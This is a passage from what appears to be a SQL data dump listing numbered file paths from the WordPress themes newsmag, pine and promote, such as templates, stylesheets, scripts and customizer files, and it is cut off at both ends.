ssets/images/grey.gif'),(2966,'wp-content/themes/newsmag/assets/images/header.jpg'),(2967,'wp-content/themes/newsmag/assets/images/picture_placeholder.jpg'),(2968,'wp-content/themes/newsmag/assets/images/picture_placeholder_list.jpg'),(2969,'wp-content/themes/newsmag/assets/js/functions.js'),(2970,'wp-content/themes/newsmag/assets/js/navigation.js'),(2971,'wp-content/themes/newsmag/assets/js/skip-link-focus-fix.js'),(2972,'wp-content/themes/newsmag/assets/sass/elements/_elements.scss'),(2973,'wp-content/themes/newsmag/assets/sass/elements/_lists.scss'),(2974,'wp-content/themes/newsmag/assets/sass/elements/_tables.scss'),(2975,'wp-content/themes/newsmag/assets/sass/forms/_buttons.scss'),(2976,'wp-content/themes/newsmag/assets/sass/forms/_fields.scss'),(2977,'wp-content/themes/newsmag/assets/sass/forms/_forms.scss'),(2978,'wp-content/themes/newsmag/assets/sass/layout/_body.scss'),(2979,'wp-content/themes/newsmag/assets/sass/layout/_footer.scss'),(2980,'wp-content/themes/newsmag/assets/sass/layout/_header.scss'),(2981,'wp-content/themes/newsmag/assets/sass/layout/_layout.scss'),(2982,'wp-content/themes/newsmag/assets/sass/media/_captions.scss'),(2983,'wp-content/themes/newsmag/assets/sass/media/_galleries.scss'),(2984,'wp-content/themes/newsmag/assets/sass/media/_media.scss'),(2985,'wp-content/themes/newsmag/assets/sass/mixins/_mixins-master.scss'),(2986,'wp-content/themes/newsmag/assets/sass/modules/_accessibility.scss'),(2987,'wp-content/themes/newsmag/assets/sass/modules/_alignments.scss'),(2988,'wp-content/themes/newsmag/assets/sass/modules/_breadcrumbs.scss'),(2989,'wp-content/themes/newsmag/assets/sass/modules/_clearings.scss'),(2990,'wp-content/themes/newsmag/assets/sass/modules/_infinite-scroll.scss'),(2991,'wp-content/themes/newsmag/assets/sass/modules/_news-ticker.scss'),(2992,'wp-content/themes/newsmag/assets/sass/modules/_recent-posts.scss'),(2993,'wp-content/themes/newsmag/assets/sass/modules/_related-posts.scss'),(2994,'wp-content/themes/newsmag/assets/sass/navigation/_links.scss'),(2995,'wp-content/themes/newsmag/assets/sass/navigation/_menus.scss'),(2996,'wp-content/themes/newsmag/assets/sass/navigation/_navigation.scss'),(2997,'wp-content/themes/newsmag/assets/sass/navigation/_socials.scss'),(2998,'wp-content/themes/newsmag/assets/sass/navigation/_top-header.scss'),(2999,'wp-content/themes/newsmag/assets/sass/site/_site.scss'),(3000,'wp-content/themes/newsmag/assets/sass/site/primary/_asides.scss'),(3001,'wp-content/themes/newsmag/assets/sass/site/primary/_comments.scss'),(3002,'wp-content/themes/newsmag/assets/sass/site/primary/_posts-and-pages.scss'),(3003,'wp-content/themes/newsmag/assets/sass/site/secondary/_widget-banner.scss'),(3004,'wp-content/themes/newsmag/assets/sass/site/secondary/_widget-posts.scss'),(3005,'wp-content/themes/newsmag/assets/sass/site/secondary/_widget-recent-posts.scss'),(3006,'wp-content/themes/newsmag/assets/sass/site/secondary/_widget-slider.scss'),(3007,'wp-content/themes/newsmag/assets/sass/site/secondary/_widgets.scss'),(3008,'wp-content/themes/newsmag/assets/sass/style.scss'),(3009,'wp-content/themes/newsmag/assets/sass/typography/_copy.scss'),(3010,'wp-content/themes/newsmag/assets/sass/typography/_headings.scss'),(3011,'wp-content/themes/newsmag/assets/sass/typography/_typography.scss'),(3012,'wp-content/themes/newsmag/assets/sass/variables-site/_colors.scss'),(3013,'wp-content/themes/newsmag/assets/sass/variables-site/_structure.scss'),(3014,'wp-content/themes/newsmag/assets/sass/variables-site/_typography.scss'),(3015,'wp-content/themes/newsmag/assets/sass/variables-site/_variables-site.scss'),(3016,'wp-content/themes/newsmag/assets/vendors/adsenseloader/jquery.adsenseloader.js'),(3017,'wp-content/themes/newsmag/assets/vendors/blazy/blazy.js'),(3018,'wp-content/themes/newsmag/assets/vendors/blazy/blazy.min.js'),(3019,'wp-content/themes/newsmag/assets/vendors/bootstrap/bootstrap-theme.min.css'),(3020,'wp-content/themes/newsmag/assets/vendors/bootstrap/bootstrap.css'),(3021,'wp-content/themes/newsmag/assets/vendors/bootstrap/bootstrap.js'),(3022,'wp-content/themes/newsmag/assets/vendors/bootstrap/bootstrap.min.css'),(3023,'wp-content/themes/newsmag/assets/vendors/bootstrap/bootstrap.min.js'),(3024,'wp-content/themes/newsmag/assets/vendors/bootstrap/glyphicons-halflings-regular.eot'),(3025,'wp-content/themes/newsmag/assets/vendors/bootstrap/glyphicons-halflings-regular.svg'),(3026,'wp-content/themes/newsmag/assets/vendors/bootstrap/glyphicons-halflings-regular.ttf'),(3027,'wp-content/themes/newsmag/assets/vendors/bootstrap/glyphicons-halflings-regular.woff'),(3028,'wp-content/themes/newsmag/assets/vendors/bootstrap/glyphicons-halflings-regular.woff2'),(3029,'wp-content/themes/newsmag/assets/vendors/fontawesome/FontAwesome.otf'),(3030,'wp-content/themes/newsmag/assets/vendors/fontawesome/font-awesome.css'),(3031,'wp-content/themes/newsmag/assets/vendors/fontawesome/font-awesome.min.css'),(3032,'wp-content/themes/newsmag/assets/vendors/fontawesome/fontawesome-webfont.eot'),(3033,'wp-content/themes/newsmag/assets/vendors/fontawesome/fontawesome-webfont.svg'),(3034,'wp-content/themes/newsmag/assets/vendors/fontawesome/fontawesome-webfont.ttf'),(3035,'wp-content/themes/newsmag/assets/vendors/fontawesome/fontawesome-webfont.woff'),(3036,'wp-content/themes/newsmag/assets/vendors/fontawesome/fontawesome-webfont.woff2'),(3037,'wp-content/themes/newsmag/assets/vendors/machothemes/components/adsenseloader.js'),(3038,'wp-content/themes/newsmag/assets/vendors/machothemes/components/blazy.js'),(3039,'wp-content/themes/newsmag/assets/vendors/machothemes/components/gotop.js'),(3040,'wp-content/themes/newsmag/assets/vendors/machothemes/components/mainslider.js'),(3041,'wp-content/themes/newsmag/assets/vendors/machothemes/components/offscreen.js'),(3042,'wp-content/themes/newsmag/assets/vendors/machothemes/components/searchform.js'),(3043,'wp-content/themes/newsmag/assets/vendors/machothemes/components/sticky.js'),(3044,'wp-content/themes/newsmag/assets/vendors/machothemes/components/styleselects.js'),(3045,'wp-content/themes/newsmag/assets/vendors/machothemes/machothemes.js'),(3046,'wp-content/themes/newsmag/assets/vendors/machothemes/machothemes.min.js'),(3047,'wp-content/themes/newsmag/assets/vendors/offscreen/offscreen.js'),(3048,'wp-content/themes/newsmag/assets/vendors/offscreen/offscreen.min.js'),(3049,'wp-content/themes/newsmag/assets/vendors/owl-carousel/ajax-loader.gif'),(3050,'wp-content/themes/newsmag/assets/vendors/owl-carousel/index.html'),(3051,'wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.carousel.css'),(3052,'wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.carousel.js'),(3053,'wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.carousel.min.css'),(3054,'wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.carousel.min.js'),(3055,'wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.theme.default.css'),(3056,'wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.video.play.png'),(3057,'wp-content/themes/newsmag/assets/vendors/sticky/jquery.sticky.js'),(3058,'wp-content/themes/newsmag/changelog.txt'),(3059,'wp-content/themes/newsmag/comments.php'),(3060,'wp-content/themes/newsmag/footer.php'),(3061,'wp-content/themes/newsmag/front-page.php'),(3062,'wp-content/themes/newsmag/functions.php'),(3063,'wp-content/themes/newsmag/header.php'),(3064,'wp-content/themes/newsmag/inc/admin/welcome-screen/css/welcome.css'),(3065,'wp-content/themes/newsmag/inc/admin/welcome-screen/css/welcome_customizer.css'),(3066,'wp-content/themes/newsmag/inc/admin/welcome-screen/img/ajax-loader.gif'),(3067,'wp-content/themes/newsmag/inc/admin/welcome-screen/img/macho-themes-logo.svg'),(3068,'wp-content/themes/newsmag/inc/admin/welcome-screen/js/welcome.js'),(3069,'wp-content/themes/newsmag/inc/admin/welcome-screen/js/welcome_customizer.js'),(3070,'wp-content/themes/newsmag/inc/admin/welcome-screen/sections/actions-required.php'),(3071,'wp-content/themes/newsmag/inc/admin/welcome-screen/sections/changelog.php'),(3072,'wp-content/themes/newsmag/inc/admin/welcome-screen/sections/getting-started.php'),(3073,'wp-content/themes/newsmag/inc/admin/welcome-screen/sections/recommended-plugins.php'),(3074,'wp-content/themes/newsmag/inc/admin/welcome-screen/sections/support.php'),(3075,'wp-content/themes/newsmag/inc/admin/welcome-screen/welcome-screen.php'),(3076,'wp-content/themes/newsmag/inc/assets/css/custom-editor-style.css'),(3077,'wp-content/themes/newsmag/inc/class-epsilon-typography.php'),(3078,'wp-content/themes/newsmag/inc/components/breadcrumbs/class-newsmag-breadcrumbs.php'),(3079,'wp-content/themes/newsmag/inc/components/breadcrumbs/index.html'),(3080,'wp-content/themes/newsmag/inc/components/lazyload/class-newsmag-lazyload.php'),(3081,'wp-content/themes/newsmag/inc/components/lazyload/index.html'),(3082,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/css/style.css'),(3083,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/data/gfonts.json'),(3084,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_carousel.png'),(3085,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_column.png'),(3086,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_grid.png'),(3087,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_horizontal.png'),(3088,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_slider.png'),(3089,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_vertical_list.png'),(3090,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/js/checkbox-multiple.js'),(3091,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/js/customizer.js'),(3092,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/js/epsilon.js'),(3093,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/js/previewer.js'),(3094,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/vendors/selectize/selectize.css'),(3095,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/vendors/selectize/selectize.js'),(3096,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/vendors/selectize/selectize.min.js'),(3097,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/control-epsilon-checkbox-multiple.php'),(3098,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/control-epsilon-slider-control.php'),(3099,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/control-epsilon-toggle.php'),(3100,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/control-epsilon-typography.php'),(3101,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/control-epsilon-upsell.php'),(3102,'wp-content/themes/newsmag/inc/customizer/register_settings.php'),(3103,'wp-content/themes/newsmag/inc/customizer/settings/banners/controls.php'),(3104,'wp-content/themes/newsmag/inc/customizer/settings/banners/sections.php'),(3105,'wp-content/themes/newsmag/inc/customizer/settings/banners/settings.php'),(3106,'wp-content/themes/newsmag/inc/customizer/settings/general/controls.php'),(3107,'wp-content/themes/newsmag/inc/customizer/settings/general/panels.php'),(3108,'wp-content/themes/newsmag/inc/customizer/settings/general/sections.php'),(3109,'wp-content/themes/newsmag/inc/customizer/settings/general/settings.php'),(3110,'wp-content/themes/newsmag/inc/customizer.php'),(3111,'wp-content/themes/newsmag/inc/enqueues.php'),(3112,'wp-content/themes/newsmag/inc/extras.php'),(3113,'wp-content/themes/newsmag/inc/jetpack.php'),(3114,'wp-content/themes/newsmag/inc/notify-system-checks.php'),(3115,'wp-content/themes/newsmag/inc/sidebars.php'),(3116,'wp-content/themes/newsmag/inc/template-tags.php'),(3117,'wp-content/themes/newsmag/inc/theme-setup.php'),(3118,'wp-content/themes/newsmag/inc/widgets/homepage_slider/class-widget-newsmag-homepage_slider.php'),(3119,'wp-content/themes/newsmag/inc/widgets/homepage_slider/layouts/slider.php'),(3120,'wp-content/themes/newsmag/inc/widgets/popularposts/class-widget-newsmag-popularposts.php'),(3121,'wp-content/themes/newsmag/inc/widgets/posts_column/class-widget-newsmag-posts_column.php'),(3122,'wp-content/themes/newsmag/inc/widgets/posts_column/layouts/posts_column.php'),(3123,'wp-content/themes/newsmag/inc/widgets/posts_column/layouts/posts_column_featured.php'),(3124,'wp-content/themes/newsmag/inc/widgets/posts_grid/class-widget-newsmag-posts_grid.php'),(3125,'wp-content/themes/newsmag/inc/widgets/posts_grid/layouts/posts_grid.php'),(3126,'wp-content/themes/newsmag/inc/widgets/posts_list_horizontal/class-widget-newsmag-posts_list_horizontal.php'),(3127,'wp-content/themes/newsmag/inc/widgets/posts_list_horizontal/layouts/posts_list_horizontal.php'),(3128,'wp-content/themes/newsmag/inc/widgets/posts_list_vertical/class-widget-newsmag-posts_list_vertical.php'),(3129,'wp-content/themes/newsmag/inc/widgets/posts_list_vertical/layouts/posts_list_vertical.php'),(3130,'wp-content/themes/newsmag/inc/widgets.php'),(3131,'wp-content/themes/newsmag/index.php'),(3132,'wp-content/themes/newsmag/package.json'),(3133,'wp-content/themes/newsmag/page.php'),(3134,'wp-content/themes/newsmag/readme.txt'),(3135,'wp-content/themes/newsmag/screenshot.jpg'),(3136,'wp-content/themes/newsmag/search.php'),(3137,'wp-content/themes/newsmag/sidebar-footer.php'),(3138,'wp-content/themes/newsmag/sidebar.php'),(3139,'wp-content/themes/newsmag/single.php'),(3140,'wp-content/themes/newsmag/style.css'),(3141,'wp-content/themes/newsmag/template-parts/after-footer.php'),(3142,'wp-content/themes/newsmag/template-parts/author-info.php'),(3143,'wp-content/themes/newsmag/template-parts/banner/banner-adsense.php'),(3144,'wp-content/themes/newsmag/template-parts/banner/banner-image.php'),(3145,'wp-content/themes/newsmag/template-parts/content-none.php'),(3146,'wp-content/themes/newsmag/template-parts/content-page.php'),(3147,'wp-content/themes/newsmag/template-parts/content-search.php'),(3148,'wp-content/themes/newsmag/template-parts/content-single.php'),(3149,'wp-content/themes/newsmag/template-parts/content.php'),(3150,'wp-content/themes/newsmag/template-parts/social.php'),(3151,'wp-content/themes/pine/404.php'),(3152,'wp-content/themes/pine/CHANGELOG.md'),(3153,'wp-content/themes/pine/README.md'),(3154,'wp-content/themes/pine/admin/css/pine-admin-page.css'),(3155,'wp-content/themes/pine/admin/css/pine-customize-control-color-scheme.css'),(3156,'wp-content/themes/pine/admin/css/pine-customize-control-layout.css'),(3157,'wp-content/themes/pine/admin/css/pine-customize-control-social-buttons.css'),(3158,'wp-content/themes/pine/admin/css/pine-editor.css'),(3159,'wp-content/themes/pine/admin/img/disabled.png'),(3160,'wp-content/themes/pine/admin/img/left.png'),(3161,'wp-content/themes/pine/admin/img/none.png'),(3162,'wp-content/themes/pine/admin/img/right.png'),(3163,'wp-content/themes/pine/admin/js/pine-customize-control-color-scheme.js'),(3164,'wp-content/themes/pine/admin/js/pine-customize-control-layout.js'),(3165,'wp-content/themes/pine/admin/js/pine-customize-control-social-buttons.js'),(3166,'wp-content/themes/pine/admin/js/pine-less.js'),(3167,'wp-content/themes/pine/admin/js/pine-notifications.js'),(3168,'wp-content/themes/pine/archive.php'),(3169,'wp-content/themes/pine/comments.php'),(3170,'wp-content/themes/pine/css/color-blue.css'),(3171,'wp-content/themes/pine/css/color-green.css'),(3172,'wp-content/themes/pine/css/color-orange.css'),(3173,'wp-content/themes/pine/css/color-purple.css'),(3174,'wp-content/themes/pine/css/color-yellow.css'),(3175,'wp-content/themes/pine/css/font-awesome.css'),(3176,'wp-content/themes/pine/css/style.css'),(3177,'wp-content/themes/pine/footer.php'),(3178,'wp-content/themes/pine/functions.php'),(3179,'wp-content/themes/pine/header.php'),(3180,'wp-content/themes/pine/img/content/portfolio.jpg'),(3181,'wp-content/themes/pine/img/icons/dropdown-ico.png'),(3182,'wp-content/themes/pine/img/layout/404-bg.jpg'),(3183,'wp-content/themes/pine/inc/admin-page.php'),(3184,'wp-content/themes/pine/inc/classes/class-pine-notifications.php'),(3185,'wp-content/themes/pine/inc/customizer-controls.php'),(3186,'wp-content/themes/pine/inc/customizer-functions.php'),(3187,'wp-content/themes/pine/inc/customizer.php'),(3188,'wp-content/themes/pine/inc/extras.php'),(3189,'wp-content/themes/pine/inc/jetpack.php'),(3190,'wp-content/themes/pine/inc/notifications.php'),(3191,'wp-content/themes/pine/inc/template-tags.php'),(3192,'wp-content/themes/pine/index.php'),(3193,'wp-content/themes/pine/js/customizer.js'),(3194,'wp-content/themes/pine/js/scripts.js'),(3195,'wp-content/themes/pine/js/vendors.js'),(3196,'wp-content/themes/pine/page.php'),(3197,'wp-content/themes/pine/projects-list.php'),(3198,'wp-content/themes/pine/screenshot.png'),(3199,'wp-content/themes/pine/search.php'),(3200,'wp-content/themes/pine/searchform.php'),(3201,'wp-content/themes/pine/sidebar.php'),(3202,'wp-content/themes/pine/single.php'),(3203,'wp-content/themes/pine/style.css'),(3204,'wp-content/themes/pine/template-parts/content-aside.php'),(3205,'wp-content/themes/pine/template-parts/content-chat.php'),(3206,'wp-content/themes/pine/template-parts/content-link.php'),(3207,'wp-content/themes/pine/template-parts/content-none.php'),(3208,'wp-content/themes/pine/template-parts/content-page.php'),(3209,'wp-content/themes/pine/template-parts/content-portfolio-list.php'),(3210,'wp-content/themes/pine/template-parts/content-single-chat.php'),(3211,'wp-content/themes/pine/template-parts/content-single.php'),(3212,'wp-content/themes/pine/template-parts/content-status.php'),(3213,'wp-content/themes/pine/template-parts/content.php'),(3214,'wp-content/themes/promote/404.php'),(3215,'wp-content/themes/promote/README.md'),(3216,'wp-content/themes/promote/archive.php'),(3217,'wp-content/themes/promote/author.php'),(3218,'wp-content/themes/promote/category.php'),(3219,'wp-content/themes/promote/comments.php'),(3220,'wp-content/themes/promote/content-none.php'),(3221,'wp-content/themes/promote/content-single.php'),(3222,'wp-content/themes/promote/content.php'),(3223,'wp-content/themes/promote/css/admin.css'),(3224,'wp-content/themes/promote/css/custom_script.css'),(3225,'wp-content/themes/promote/css/promote.css'),(3226,'wp-content/themes/promote/css/unminified/animate.css'),(3227,'wp-content/themes/promote/css/unminified/foundation.css'),(3228,'wp-content/themes/promote/css/unminified/jquery.sidr.dark.css'),(3229,'wp-content/themes/promote/css/unminified/normalize.css'),(3230,'wp-content/themes/promote/css/unminified/owl.carousel.css'),(3231,'wp-content/themes/promote/css/welcome-page.css'),(3232,'wp-content/themes/promote/footer/part-footer1.php'),(3233,'wp-content/themes/promote/footer.php'),(3234,'wp-content/themes/promote/front-page.php'),(3235,'wp-content/themes/promote/functions.php'),(3236,'wp-content/themes/promote/header.php'),(3237,'wp-content/themes/promote/images/blank1.jpg'),(3238,'wp-content/themes/promote/images/header.jpg'),(3239,'wp-content/themes/promote/images/ico-delete.png'),(3240,'wp-content/themes/promote/images/link.png'),(3241,'wp-content/themes/promote/images/list_type.png'),(3242,'wp-content/themes/promote/images/rps_arrows.png'),(3243,'wp-content/themes/promote/images/sep-shadow.png'),(3244,'wp-content/themes/promote/images/shadow.png'),(3245,'wp-content/themes/promote/images/slider.jpg'),(3246,'wp-content/themes/promote/images/ui.totop.png'),(3247,'wp-content/themes/promote/images/work_img1.jpg'),(3248,'wp-content/themes/promote/inc/admin/welcome-screen/sections/getting-started.php'),(3249,'wp-content/themes/promote/inc/admin/welcome-screen/welcome-screen.php'),(3250,'wp-content/themes/promote/inc/class-tgm-plugin-activation.php'),(3251,'wp-content/themes/promote/inc/customizer/config.php'),(3252,'wp-content/themes/promote/inc/customizer/fields.php'),(3253,'wp-content/themes/promote/inc/customizer/panels.php'),(3254,'wp-content/themes/promote/inc/customizer/sections.php'),(3255,'wp-content/themes/promote/inc/customizer.php'),(3256,'wp-content/themes/promote/inc/kirki/Gruntfile.js'),(3257,'wp-content/themes/promote/inc/kirki/assets/css/customizer-dynamic-css-colors.php'),(3258,'wp-content/themes/promote/inc/kirki/assets/css/customizer-dynamic-css-width.php'),(3259,'wp-content/themes/promote/inc/kirki/assets/css/customizer-dynamic-css.php'),(3260,'wp-content/themes/promote/inc/kirki/assets/css/customizer.css'),(3261,'wp-content/themes/promote/inc/kirki/assets/css/customizer.css.map'),(3262,'wp-content/themes/promote/inc/kirki/assets/css/hint.css'),(3263,'wp-content/themes/promote/inc/kirki/assets/css/kirki-styles.css'),(3264,'wp-content/themes/promote/inc/kirki/assets/css/select2.min.css'),(3265,'wp-content/themes/promote/inc/kirki/assets/css/transparency-grid.png'),(3266,'wp-content/themes/promote/inc/kirki/assets/images/1c.png'),(3267,'wp-content/themes/promote/inc/kirki/assets/images/2cl.png'),(3268,'wp-content/themes/promote/inc/kirki/assets/images/2cr.png'),(3269,'wp-content/themes/promote/inc/kirki/assets/images/3cl.png'),(3270,'wp-content/themes/promote/inc/kirki/assets/images/3cm.png'),(3271,'wp-content/themes/promote/inc/kirki/assets/images/3cr.png'),(3272,'wp-content/themes/promote/inc/kirki/assets/images/jquery.fs.stepper-arrows.png'),(3273,'wp-content/themes/promote/inc/kirki/assets/images/kirki-bottom.png'),(3274,'wp-content/themes/promote/inc/kirki/assets/images/kirki-bottom.svg'),(3275,'wp-content/themes/promote/inc/kirki/assets/images/kirki-logo.svg'),(3276,'wp-content/themes/promote/inc/kirki/assets/images/kirki-toolkit.png'),(3277,'wp-content/themes/promote/inc/kirki/assets/js/branding.js'),(3278,'wp-content/themes/promote/inc/kirki/assets/js/controls/checkbox.js'),(3279,'wp-content/themes/promote/inc/kirki/assets/js/controls/code.js'),(3280,'wp-content/themes/promote/inc/kirki/assets/js/controls/color-palette.js'),(3281,'wp-content/themes/promote/inc/kirki/assets/js/controls/color.js'),(3282,'wp-content/themes/promote/inc/kirki/assets/js/controls/custom.js'),(3283,'wp-content/themes/promote/inc/kirki/assets/js/controls/dashicons.js'),(3284,'wp-content/themes/promote/inc/kirki/assets/js/controls/date.js'),(3285,'wp-content/themes/promote/inc/kirki/assets/js/controls/dimension.js'),(3286,'wp-content/themes/promote/inc/kirki/assets/js/controls/dropdown-pages.js'),(3287,'wp-content/themes/promote/inc/kirki/assets/js/controls/editor.js'),(3288,'wp-content/themes/promote/inc/kirki/assets/js/controls/generic.js'),(3289,'wp-content/themes/promote/inc/kirki/assets/js/controls/multicheck.js'),(3290,'wp-content/themes/promote/inc/kirki/assets/js/controls/multicolor.js'),(3291,'wp-content/themes/promote/inc/kirki/assets/js/controls/number.js'),(3292,'wp-content/themes/promote/inc/kirki/assets/js/controls/palette.js'),(3293,'wp-content/themes/promote/inc/kirki/assets/js/controls/preset.js'),(3294,'wp-content/themes/promote/inc/kirki/assets/js/controls/radio-buttonset.js'),(3295,'wp-content/themes/promote/inc/kirki/assets/js/controls/radio-image.js'),(3296,'wp-content/themes/promote/inc/kirki/assets/js/controls/radio.js'),(3297,'wp-content/themes/promote/inc/kirki/assets/js/controls/repeater.js'),(3298,'wp-content/themes/promote/inc/kirki/assets/js/controls/select.js'),(3299,'wp-content/themes/promote/inc/kirki/assets/js/controls/slider.js'),(3300,'wp-content/themes/promote/inc/kirki/assets/js/controls/sortable.js'),(3301,'wp-content/themes/promote/inc/kirki/assets/js/controls/spacing.js'),(3302,'wp-content/themes/promote/inc/kirki/assets/js/controls/switch.js'),(3303,'wp-content/themes/promote/inc/kirki/assets/js/controls/toggle.js'),(3304,'wp-content/themes/promote/inc/kirki/assets/js/controls/typography.js'),(3305,'wp-content/themes/promote/inc/kirki/assets/js/functions/notifications.js'),(3306,'wp-content/themes/promote/inc/kirki/assets/js/functions/set-setting-value.js'),(3307,'wp-content/themes/promote/inc/kirki/assets/js/functions/validate-css-value.js'),(3308,'wp-content/themes/promote/inc/kirki/assets/js/l10n.js'),(3309,'wp-content/themes/promote/inc/kirki/assets/js/postmessage.js'),(3310,'wp-content/themes/promote/inc/kirki/assets/js/reset.js'),(3311,'wp-content/themes/promote/inc/kirki/assets/js/tooltip.js'),(3312,'wp-content/themes/promote/inc/kirki/assets/js/vendor/selectize.js'),(3313,'wp-content/themes/promote/inc/kirki/assets/js/vendor/serialize.js'),(3314,'wp-content/themes/promote/inc/kirki/assets/js/vendor/tinymce.plugin.code.js'),(3315,'wp-content/themes/promote/inc/kirki/assets/js/vendor/wp-color-picker-alpha.js'),(3316,'wp-content/themes/promote/inc/kirki/assets/scss/controls/checkbox.scss'),(3317,'wp-content/themes/promote/inc/kirki/assets/scss/controls/code.scss'),(3318,'wp-content/themes/promote/inc/kirki/assets/scss/controls/color-palette.scss'),(3319,'wp-content/themes/promote/inc/kirki/assets/scss/controls/color.scss'),(3320,'wp-content/themes/promote/inc/kirki/assets/scss/controls/dashicons.scss'),(3321,'wp-content/themes/promote/inc/kirki/assets/scss/controls/date.scss'),(3322,'wp-content/themes/promote/inc/kirki/assets/scss/controls/dimension.scss'),(3323,'wp-content/themes/promote/inc/kirki/assets/scss/controls/editor.scss'),(3324,'wp-content/themes/promote/inc/kirki/assets/scss/controls/generic.scss'),(3325,'wp-content/themes/promote/inc/kirki/assets/scss/controls/multicheck.scss'),(3326,'wp-content/themes/promote/inc/kirki/assets/scss/controls/multicolor.scss'),(3327,'wp-content/themes/promote/inc/kirki/assets/scss/controls/number.scss'),(3328,'wp-content/themes/promote/inc/kirki/assets/scss/controls/palette.scss'),(3329,'wp-content/themes/promote/inc/kirki/assets/scss/controls/radio-buttonset.scss'),(3330,'wp-content/themes/promote/inc/kirki/assets/scss/controls/radio-image.scss'),(3331,'wp-content/themes/promote/inc/kirki/assets/scss/controls/radio.scss'),(3332,'wp-content/themes/promote/inc/kirki/assets/scss/controls/repeater.scss'),(3333,'wp-content/themes/promote/inc/kirki/assets/scss/controls/select.scss'),(3334,'wp-content/themes/promote/inc/kirki/assets/scss/controls/slider.scss'),(3335,'wp-content/themes/promote/inc/kirki/assets/scss/controls/sortable.scss'),(3336,'wp-content/themes/promote/inc/kirki/assets/scss/controls/spacing.scss'),(3337,'wp-content/themes/promote/inc/kirki/assets/scss/controls/switch.scss'),(3338,'wp-content/themes/promote/inc/kirki/assets/scss/controls/toggle.scss'),(3339,'wp-content/themes/promote/inc/kirki/assets/scss/controls/typography.scss'),(3340,'wp-content/themes/promote/inc/kirki/assets/scss/customizer.scss'),(3341,'wp-content/themes/promote/inc/kirki/assets/scss/global.scss'),(3342,'wp-content/themes/promote/inc/kirki/assets/scss/panels/expanded.scss'),(3343,'wp-content/themes/promote/inc/kirki/assets/scss/sections/expanded.scss'),(3344,'wp-content/themes/promote/inc/kirki/assets/scss/sections/hover.scss'),(3345,'wp-content/themes/promote/inc/kirki/assets/scss/tooltips.scss'),(3346,'wp-content/themes/promote/inc/kirki/autoloader.php'),(3347,'wp-content/themes/promote/inc/kirki/includes/class-kirki-active-callback.php'),(3348,'wp-content/themes/promote/inc/kirki/includes/class-kirki-config.php'),(3349,'wp-content/themes/promote/inc/kirki/includes/class-kirki-control.php'),(3350,'wp-content/themes/promote/inc/kirki/includes/class-kirki-customize-control.php'),(3351,'wp-content/themes/promote/inc/kirki/includes/class-kirki-enqueue.php'),(3352,'wp-content/themes/promote/inc/kirki/includes/class-kirki-explode-background-field.php'),(3353,'wp-content/themes/promote/inc/kirki/includes/class-kirki-field.php'),(3354,'wp-content/themes/promote/inc/kirki/includes/class-kirki-fonts-google.php'),(3355,'wp-content/themes/promote/inc/kirki/includes/class-kirki-fonts.php'),(3356,'wp-content/themes/promote/inc/kirki/includes/class-kirki-helper.php'),(3357,'wp-content/themes/promote/inc/kirki/includes/class-kirki-init.php'),(3358,'wp-content/themes/promote/inc/kirki/includes/class-kirki-l10n.php'),(3359,'wp-content/themes/promote/inc/kirki/includes/class-kirki-panel.php'),(3360,'wp-content/themes/promote/inc/kirki/includes/class-kirki-sanitize-values.php'),(3361,'wp-content/themes/promote/inc/kirki/includes/class-kirki-scripts-registry.php'),(3362,'wp-content/themes/promote/inc/kirki/includes/class-kirki-section.php'),(3363,'wp-content/themes/promote/inc/kirki/includes/class-kirki-selective-refresh.php'),(3364,'wp-content/themes/promote/inc/kirki/includes/class-kirki-settings.php'),(3365,'wp-content/themes/promote/inc/kirki/includes/class-kirki-toolkit.php'),(3366,'wp-content/themes/promote/inc/kirki/includes/class-kirki-values.php'),(3367,'wp-content/themes/promote/inc/kirki/includes/class-kirki.php'),(3368,'wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-checkbox-control.php'),(3369,'wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-code-control.php'),(3370,'wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-color-control.php'),(3371,'wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-color-palette-control.php'),(3372,'wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-custom-control.php'),(3373,'wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-dashicons-control.php'),(3374,'wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-date-control.php'),(3375,'wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-dimension-control.php'),(3376,'wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-dropdown-pages-control.php'),(3377,'wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-editor-control.php'),(3378,'wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-generic-control.php'),(3379,'wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-multicheck-control.php'),(3380,'wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-multicolor-control.php'),(3381,'wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-number-control.php'),(3382,'wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-palette-control.php'),(3383,'wp-content/themes/promote/inc/kirki/includes/controls/c